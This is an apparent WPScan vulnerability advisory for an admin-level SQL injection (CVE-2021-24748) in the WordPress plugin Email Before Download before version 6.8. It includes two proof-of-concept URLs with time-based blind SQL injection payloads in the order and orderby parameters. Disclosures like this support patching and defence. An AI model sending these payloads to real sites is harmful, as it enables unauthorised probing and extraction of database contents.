Lucene search
Anton SarsadskikhWPVDB-ID:A8625B84-337D-4C4D-A698-73E59D1F8EE1HistoryNov 01, 2021 - 12:00 a.m.
Email Before Download < 6.8 - Admin+ SQL Injection
2021-11-0100:00:00
Anton Sarsadskikh
wpscan.com
9
0.001 Low
EPSS
Percentile
37.9%
The plugin does not properly validate and escape the order and orderby GET parameters before using them in SQL statements, leading to authenticated SQL injection issues
PoC
https://example.com/wp-admin/admin.php?page=email-before-download-links&order;=desc&orderby;=time_requested+AND+(SELECT+1554+FROM+(SELECT(SLEEP(5)))gPZH) https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby;=time_requested&order;=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
| CPE | Name | Operator | Version |
|---|---|---|---|
| email-before-download | lt | 6.8 |
Related
cve
cve
CVE-2021-24748
2021-11-29 09:15:07
prion
prion
Sql injection
2021-11-29 09:15:00
cvelist
cvelist
CVE-2021-24748 Email Before Download < 6.8 - Admin+ SQL Injection
2021-11-29 08:25:31
wpexploit
wpexploit
Email Before Download < 6.8 - Admin+ SQL Injection
2021-11-01 00:00:00
nvd
nvd
CVE-2021-24748
2021-11-29 09:15:07